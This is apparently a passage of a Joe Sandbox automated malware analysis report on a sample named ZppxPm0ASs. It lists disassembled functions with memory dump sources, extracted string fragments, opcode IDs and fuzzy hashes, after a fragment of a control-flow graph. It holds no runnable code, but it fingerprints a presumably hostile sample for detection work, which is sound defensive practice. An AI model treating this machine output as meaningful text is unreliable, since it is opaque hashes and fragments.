call 7ffaac6257c0 call 7ffaac629660 call 7ffaac6259f0 1105->1113 1114 7ffaac62b5b9-7ffaac62b5bc 1105->1114 1185 7ffaac62b485-7ffaac62b48f call 7ffaac6245e0 1110->1185 1141 7ffaac62b763-7ffaac62b785 call 7ffaac62b786 call 7ffaac62b7d1 1111->1141 1112->1105 1155 7ffaac62b541-7ffaac62b54c 1113->1155 1156 7ffaac62b309-7ffaac62b327 1113->1156 1120 7ffaac62b5bd-7ffaac62b5fe call 7ffaac624e20 call 7ffaac629c20 call 7ffaac6245f8 1114->1120 1146 7ffaac62b604-7ffaac62b61d call 7ffaac6257c0 1120->1146 1147 7ffaac62b707-7ffaac62b70e 1120->1147 1162 7ffaac62b53c 1146->1162 1164 7ffaac62b623-7ffaac62b637 1146->1164 1151 7ffaac62b63d-7ffaac62b663 call 7ffaac624600 call 7ffaac6259f0 1147->1151 1176 7ffaac62b367-7ffaac62b390 1151->1176 1177 7ffaac62b669-7ffaac62b674 1151->1177 1155->1120 1167 7ffaac62b54e-7ffaac62b588 1155->1167 1156->1162 1163 7ffaac62b32d-7ffaac62b338 1156->1163 1162->1155 1168 7ffaac62b33a-7ffaac62b362 call 7ffaac620a68 1163->1168 1164->1151 1169 7ffaac62b6fb-7ffaac62b702 1164->1169 1167->1114 1168->1176 1169->1146 1176->1096 1176->1097 1177->1162 1179 7ffaac62b67a-7ffaac62b6f0 call 7ffaac620a68 1177->1179 1179->1177 1195 7ffaac62b6f6 1179->1195 1191 7ffaac62b494-7ffaac62b4aa call 7ffaac620a78 1185->1191 1197 7ffaac62b4ac-7ffaac62b4c8 1191->1197 1198 7ffaac62b4ef-7ffaac62b4f2 1191->1198 1195->1176 1197->1198 1205 7ffaac62b4ca-7ffaac62b4e7 1197->1205 1198->1141 1200 7ffaac62b4f8-7ffaac62b50b call 7ffaac623088 1198->1200 1200->1141 1204 7ffaac62b511-7ffaac62b537 call 7ffaac624e20 call 7ffaac624638 call 7ffaac6263c0 1200->1204 1204->1141 1205->1198
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X:$p=_H$t2_H
                                                                                                                                  • API String ID: 0-2047580285
                                                                                                                                  • Opcode ID: 203b6d6809f5bf8174639f2cbc6b6cf15c34698c9f47cc6e47cd9bfa03046d35
                                                                                                                                  • Instruction ID: 8cb927f46c28aeb160fd071f6687435e1a6d6667cb3fc9de3997318cfc960f3c
                                                                                                                                  • Opcode Fuzzy Hash: 203b6d6809f5bf8174639f2cbc6b6cf15c34698c9f47cc6e47cd9bfa03046d35
                                                                                                                                  • Instruction Fuzzy Hash: 0702A230E1DA498FEB95EB2884557A9B7E1FF9A300F0491B9D00EC7296DE24EC45CBC1
                                                                                                                                  Function 00007FFAAC625E13 Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H:$P:$X:
                                                                                                                                  • API String ID: 0-2146598166
                                                                                                                                  • Opcode ID: 9e7472d3bdcd7e3a6174fb65255c8f5d0c3c855cc5bab93b78f3ae6ecf7bf392
                                                                                                                                  • Instruction ID: 3aa256fb1527e2093cba2fc3c0e70f12e1a5e92623c9c6ecc9b9be65cb6fd288
                                                                                                                                  • Opcode Fuzzy Hash: 9e7472d3bdcd7e3a6174fb65255c8f5d0c3c855cc5bab93b78f3ae6ecf7bf392
                                                                                                                                  • Instruction Fuzzy Hash: 11A16534A19949CFEF99EF18C495AA9B7E1FF69300F1050A8E40DC7296DE25EC56CBC0
                                                                                                                                  Function 00007FFAAC62E87A Relevance: 4.0, Strings: 3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H7[$H7[$H7[
                                                                                                                                  • API String ID: 0-1414860378
                                                                                                                                  • Opcode ID: 7888d15ed0b5c31de655c131e4d8cb0a7e59af22516bd48e855680bdac6a4eeb
                                                                                                                                  • Instruction ID: a17ce7b8af6c9dcf81c687409e0ade4b221db808c975c3b6e0fbc77d9c6207e0
                                                                                                                                  • Opcode Fuzzy Hash: 7888d15ed0b5c31de655c131e4d8cb0a7e59af22516bd48e855680bdac6a4eeb
                                                                                                                                  • Instruction Fuzzy Hash: 60818230F099198FEB99EB6884556BDB3E1FF99311F44A079D00EC3292DE29EC468780
                                                                                                                                  Function 00007FFAAC622721 Relevance: 3.1, Strings: 2, Instructions: 616COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: b4$d
                                                                                                                                  • API String ID: 0-2243634771
                                                                                                                                  • Opcode ID: 2efe257e8293a47e61eab84ef19b0bb18165cb7bdb92b8953624a2e6670de7c5
                                                                                                                                  • Instruction ID: 58656492ce9edfa9a731212230e23f4c07e2956a01397660209880e8a4a3476d
                                                                                                                                  • Opcode Fuzzy Hash: 2efe257e8293a47e61eab84ef19b0bb18165cb7bdb92b8953624a2e6670de7c5
                                                                                                                                  • Instruction Fuzzy Hash: 2B022030A1DA068FE759DF28C485675B3E1EF9A314B1491BDD44ECB297EA24EC42C7C1
                                                                                                                                  Function 00007FFAAC62C120 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $$`'
                                                                                                                                  • API String ID: 0-2219122115
                                                                                                                                  • Opcode ID: e6c9d13c8c7654e76f4e916fef243ddd4e9cf5332079b99bb07531e00272c85f
                                                                                                                                  • Instruction ID: 44ed1f0ed3cb9f8c73e7710652adf2313bb8ab019d6113705e0b7eb2dece4e6d
                                                                                                                                  • Opcode Fuzzy Hash: e6c9d13c8c7654e76f4e916fef243ddd4e9cf5332079b99bb07531e00272c85f
                                                                                                                                  • Instruction Fuzzy Hash: 9AC15931A0EA858FF756DB3C8455674BBE1FF9A310B0954BAD04DC7292DE2CEC0A8381
                                                                                                                                  Function 00007FFAAC62B8E5 Relevance: 2.9, Strings: 2, Instructions: 369COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: j2_H$8_L
                                                                                                                                  • API String ID: 0-725041144
                                                                                                                                  • Opcode ID: 7dff09321bdabd21a1b7eb6c64a5a44ed5ef7b0dfe1d880860e65c5da1255f11
                                                                                                                                  • Instruction ID: b32ccd94df220a6bca53ed5327289af4e137b947a682e2f3f641aeab6d1382df
                                                                                                                                  • Opcode Fuzzy Hash: 7dff09321bdabd21a1b7eb6c64a5a44ed5ef7b0dfe1d880860e65c5da1255f11
                                                                                                                                  • Instruction Fuzzy Hash: 33B14C31E0DA498FE78ADB28C8559B977E1FF96300B0451B9E44EC7297EE24EC0687C0
                                                                                                                                  Function 00007FFAAC62B58D Relevance: 2.8, Strings: 2, Instructions: 343COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X:$p=_H
                                                                                                                                  • API String ID: 0-3431465833
                                                                                                                                  • Opcode ID: deb168e09552ffc171d6460e253cd3c87d7af64f2fbb81c301744721d5cf5efd
                                                                                                                                  • Instruction ID: 97d77771376fb207bc4ad485c1accb5ece7130e97c1105655dadf30fa8af4fb6
                                                                                                                                  • Opcode Fuzzy Hash: deb168e09552ffc171d6460e253cd3c87d7af64f2fbb81c301744721d5cf5efd
                                                                                                                                  • Instruction Fuzzy Hash: 36B17630F19A198FEB95EB2C94557A9B7E1FF89300F1091B9D04ED3296DE34EC458B81
                                                                                                                                  Function 00007FFAAC628070 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: @$`:
                                                                                                                                  • API String ID: 0-2424024272
                                                                                                                                  • Opcode ID: bd99dde00191328ce0e51723521a6131187e5bbf26f3d214aaccf3fd2e2e4c68
                                                                                                                                  • Instruction ID: 6262a087df45e5e1fdb5f9a9886e0abb3f9b825de6b5d87c8b16f5605faf18ad
                                                                                                                                  • Opcode Fuzzy Hash: bd99dde00191328ce0e51723521a6131187e5bbf26f3d214aaccf3fd2e2e4c68
                                                                                                                                  • Instruction Fuzzy Hash: A6A1E932E0E74A8FF295DB189855675B7C1EF4A314F086279D48EC72D2EE18EC4587C2
                                                                                                                                  Function 00007FFAAC620145 Relevance: 1.9, Strings: 1, Instructions: 627COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: x8
                                                                                                                                  • API String ID: 0-1874195575
                                                                                                                                  • Opcode ID: 4bddd44eae725c162c6c0f628476612e2a08298c5ff09edfad0fc60a628dcf34
                                                                                                                                  • Instruction ID: ca8d7143fd0e9e395019ecc9a5f4ff2b22e9fa1f27486fa69a9ac4c9f4b23068
                                                                                                                                  • Opcode Fuzzy Hash: 4bddd44eae725c162c6c0f628476612e2a08298c5ff09edfad0fc60a628dcf34
                                                                                                                                  • Instruction Fuzzy Hash: AD026972A0EA468FF79AD72C94556B5B7D1EF9A310F1450BAD08EC32D2ED18EC4683C1
                                                                                                                                  Function 00007FFAAC6259F0 Relevance: 1.8, Strings: 1, Instructions: 578COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X:
                                                                                                                                  • API String ID: 0-22841096
                                                                                                                                  • Opcode ID: 199d660062044ba19fbeb421b7a28895bd4ca1bad5aa62e4f61e65fb5a54f78c
                                                                                                                                  • Instruction ID: 2e646fc1983b457ab1e79e4edcd42e37a403bb5078d72953e2d41e32138f19d3
                                                                                                                                  • Opcode Fuzzy Hash: 199d660062044ba19fbeb421b7a28895bd4ca1bad5aa62e4f61e65fb5a54f78c
                                                                                                                                  • Instruction Fuzzy Hash: 9012A530A19A4D8FEF99DF18C495AA9B7E1FF59300F1450A9E44DC7296DE24EC46CBC0
                                                                                                                                  Function 00007FFAAC626E04 Relevance: 1.7, Strings: 1, Instructions: 470COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6
                                                                                                                                  • API String ID: 0-1452363761
                                                                                                                                  • Opcode ID: 68a98c542dbb035c7491a83ae4daa64df8834d888d4f8c73f4beddf17c9e3387
                                                                                                                                  • Instruction ID: 8ac01023a7c3636e863fb4f69dd6900b0c84b8f534c0ce4b32e36b4492f27433
                                                                                                                                  • Opcode Fuzzy Hash: 68a98c542dbb035c7491a83ae4daa64df8834d888d4f8c73f4beddf17c9e3387
                                                                                                                                  • Instruction Fuzzy Hash: F2E1B170A18A498FEB88DF1CD455AA9B7E1FF99300F14917DE40EC7296DE34EC468B81
                                                                                                                                  Function 00007FFAAC620AF3 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 93_^
                                                                                                                                  • API String ID: 0-1002049174
                                                                                                                                  • Opcode ID: 3bdfb399c1bc39326450782445f77734f363473354a56fdb8f8f8b646b08b4dd
                                                                                                                                  • Instruction ID: a83e349948728b1fb0dc00fce42c38f8e6f156155d2d4f0ddb2b6c72919706ec
                                                                                                                                  • Opcode Fuzzy Hash: 3bdfb399c1bc39326450782445f77734f363473354a56fdb8f8f8b646b08b4dd
                                                                                                                                  • Instruction Fuzzy Hash: 06D1C671E09A09CFEB99EB28C445AB8B7E1FF59311F145179D04EC7292EE34E8458B81
                                                                                                                                  Function 00007FFAAC620A68 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6[
                                                                                                                                  • API String ID: 0-166066200
                                                                                                                                  • Opcode ID: 78dc8e822bb8fe973476c4a61c7c1da57b55f40d85c8d960054c403c2f6aca44
                                                                                                                                  • Instruction ID: eb7ed07e993739bff59969b71bffee3f0bd2f4e5e73e74f5b5bc34dc7ea49923
                                                                                                                                  • Opcode Fuzzy Hash: 78dc8e822bb8fe973476c4a61c7c1da57b55f40d85c8d960054c403c2f6aca44
                                                                                                                                  • Instruction Fuzzy Hash: 6ED1FA30A1990DCFEF85EF58C495EA9BBE1FFA9340B145168E40ED7296DE24E845CBC0
                                                                                                                                  Function 00007FFAAC624440 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Z9_H
                                                                                                                                  • API String ID: 0-3949618940
                                                                                                                                  • Opcode ID: d225df46e45f7a68f02868bf8a4e477051533df4b26a22aa689c23b8c5ce253b
                                                                                                                                  • Instruction ID: 15da918745f5676f4db0ee6f614faee9b682e03f9c76d0306371c69dca19ca5d
                                                                                                                                  • Opcode Fuzzy Hash: d225df46e45f7a68f02868bf8a4e477051533df4b26a22aa689c23b8c5ce253b
                                                                                                                                  • Instruction Fuzzy Hash: 14815A31E1EA898FEB96E72884455B97BD1EF5A310F0560B9D04DCB293ED18DC0A8781
                                                                                                                                  Function 00007FFAAC62867A Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: h:
                                                                                                                                  • API String ID: 0-2224149621
                                                                                                                                  • Opcode ID: 2b4166533d3b05684d19af8cf250d499fbcbb10a151688e9b93ebca17e2068d8
                                                                                                                                  • Instruction ID: fa975936e48b1c8b216745d21be99cf58a1153938079ae5591e3938d6776f29d
                                                                                                                                  • Opcode Fuzzy Hash: 2b4166533d3b05684d19af8cf250d499fbcbb10a151688e9b93ebca17e2068d8
                                                                                                                                  • Instruction Fuzzy Hash: 8151253190DBC54FE7479778C865AA57FF0EF57220B1941EAC48ACB1A3DA2CAC0AC751
                                                                                                                                  Function 00007FFAAC625E04 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X:
                                                                                                                                  • API String ID: 0-22841096
                                                                                                                                  • Opcode ID: 478d8e4e18993d2452385423443d038722a31905aa8db7dd5e55bab4f7c3da4f
                                                                                                                                  • Instruction ID: 2b6c62f8c2a4ae3b48a0ab75c04900213a6716819ae3392a13c729f10ac74867
                                                                                                                                  • Opcode Fuzzy Hash: 478d8e4e18993d2452385423443d038722a31905aa8db7dd5e55bab4f7c3da4f
                                                                                                                                  • Instruction Fuzzy Hash: 2C41F474A18A4ACFEB9ADF18C455AA5B7E1FF69304F1450A8E00EC72D6DA25EC45CBC0
                                                                                                                                  Function 00007FFAAC6209E0 Relevance: .7, Instructions: 681COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fa0c11625e512a04800c22ec170c81b0e8e0a5e7432f5bb75864269300c8d10e
                                                                                                                                  • Instruction ID: 320e4cf13a793a791f9bb78fafe8e6495dcdbbfe57da95c57ba2dd1f9b31a03a
                                                                                                                                  • Opcode Fuzzy Hash: fa0c11625e512a04800c22ec170c81b0e8e0a5e7432f5bb75864269300c8d10e
                                                                                                                                  • Instruction Fuzzy Hash: F0221431A2DA4A8FE35ADB2C8486675B7D1FF95300F5495B9D48FC3286EE24F80687C1
                                                                                                                                  Function 00007FFAAC573001 Relevance: .6, Instructions: 602COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2882846579.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac570000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2d839fe2e6ca05e08f29b8da4c3250d177688f24004305019b0daa4ede4171ad
                                                                                                                                  • Instruction ID: 91a3ad7a15954fefb167fc4a62147243a2307d759c79ffed1f509cc425109c59
                                                                                                                                  • Opcode Fuzzy Hash: 2d839fe2e6ca05e08f29b8da4c3250d177688f24004305019b0daa4ede4171ad
                                                                                                                                  • Instruction Fuzzy Hash: 6E1290B195DA6BCFFB95CB5CC8452F87BF5EF5A310F0485B6D00DE3182CA2898898791
                                                                                                                                  Function 00007FFAAC573B3B Relevance: .5, Instructions: 541COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2882846579.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac570000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68d538d1f2d2aa99aad4b0e1940c3492b54f677ea1e4a0acd734dd6ada815db6
                                                                                                                                  • Instruction ID: 84ed050c2bf6d035a40217511114e37692a8c022724bedc0b8dd73916095f9e9
                                                                                                                                  • Opcode Fuzzy Hash: 68d538d1f2d2aa99aad4b0e1940c3492b54f677ea1e4a0acd734dd6ada815db6
                                                                                                                                  • Instruction Fuzzy Hash: E812363094A62ECFEBA5DB58C5497BD77B5FF5A300F104579E00DA7291CB38A889CB80
                                                                                                                                  Function 00007FFAAC625A31 Relevance: .4, Instructions: 402COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2beeb3b7356e5a3c8b390b7f7f9b9b99639373f5e84f05dd4c9406325f66838a
                                                                                                                                  • Instruction ID: 95bb180043f56f33ef7541500e13855ede8e91bd2ed446656fae7e3f7d10ba62
                                                                                                                                  • Opcode Fuzzy Hash: 2beeb3b7356e5a3c8b390b7f7f9b9b99639373f5e84f05dd4c9406325f66838a
                                                                                                                                  • Instruction Fuzzy Hash: 6FD1A430D19A498FEFA9EF18C496BA977E1FF59300F1450A9E44DC7292DA34E846CBC1
                                                                                                                                  Function 00007FFAAC62A580 Relevance: .4, Instructions: 391COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5130b455150f5052fd40a3d0c7dd99c9a0d4bebeab13f7cf516cb0635683fea3
                                                                                                                                  • Instruction ID: 327ed96146a2196479211a48f7fa05a845e97bc983d18e98fe41ce05e1fb765d
                                                                                                                                  • Opcode Fuzzy Hash: 5130b455150f5052fd40a3d0c7dd99c9a0d4bebeab13f7cf516cb0635683fea3
                                                                                                                                  • Instruction Fuzzy Hash: ACB1D370F1DA098FEB99EB6C9445AB9B7E1EF59300F109179E04ED3293DE24EC468781
                                                                                                                                  Function 00007FFAAC625A66 Relevance: .4, Instructions: 391COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1fe42bf6811b093fd471283d5b6b33eddccd139bfdaa977d0a66f6a1a961abae
                                                                                                                                  • Instruction ID: 762df7d5ed4a92e176fa9f28ff796a90f143cd858b2f58eab14b12839284a691
                                                                                                                                  • Opcode Fuzzy Hash: 1fe42bf6811b093fd471283d5b6b33eddccd139bfdaa977d0a66f6a1a961abae
                                                                                                                                  • Instruction Fuzzy Hash: ABD1A330D19A498FEFA9EF18C496BA977E1FF59301F1050A9E44DC7292DE24E846CBC0
                                                                                                                                  Function 00007FFAAC62B829 Relevance: .4, Instructions: 379COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c915785c23b8b987cc7c78628bf34e81942e39a045dfa98520d7752a20fb342d
                                                                                                                                  • Instruction ID: 4adcc9724501750ffadf1a612829b2b9eaf06eff40320170affc38b2ba10ba25
                                                                                                                                  • Opcode Fuzzy Hash: c915785c23b8b987cc7c78628bf34e81942e39a045dfa98520d7752a20fb342d
                                                                                                                                  • Instruction Fuzzy Hash: B1C16B3090DB8A8FEB4ADB28D8519A4BBE0FF56310B0451BED44EC7597EE24E846C7C1
                                                                                                                                  Function 00007FFAAC6316CD Relevance: .4, Instructions: 364COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2892417721.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac620000_ZppxPm0ASs.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8ef9ef153a31886c86b407dd7961a4f7139dbf7f426bd2e3fff8d2c721a2f62f
                                                                                                                                  • Instruction ID: 61482517f86132ca0957e0172606cdf662dc337c6ce0b00b4c580c418b1b25c6
                                                                                                                                  • Opcode Fuzzy Hash: 8ef9ef153a31886c86b407dd7961a4f7139dbf7f426bd2e3fff8d2c721a2f62f
